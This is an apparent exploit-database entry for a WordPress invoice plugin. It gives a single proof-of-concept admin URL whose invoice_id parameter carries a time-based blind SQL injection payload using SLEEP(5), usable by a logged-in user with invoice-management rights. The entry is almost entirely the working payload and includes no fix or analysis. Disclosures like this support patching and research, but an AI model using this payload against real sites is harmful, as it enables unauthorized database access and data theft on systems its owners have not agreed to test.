## https://sploitus.com/exploit?id=WPEX-ID:45F43359-98C2-4447-B51B-2D466BAD8261
When logged in with a user allowed to Manage invoice (default admin but can be changed via the plugin's settings), open the following URL
https://example.com/wp-admin/admin.php?page=new_web_invoice&invoice_id=31618572+AND+(SELECT+5926+FROM+(SELECT(SLEEP(5)))erUA)&web_invoice_action=clear_log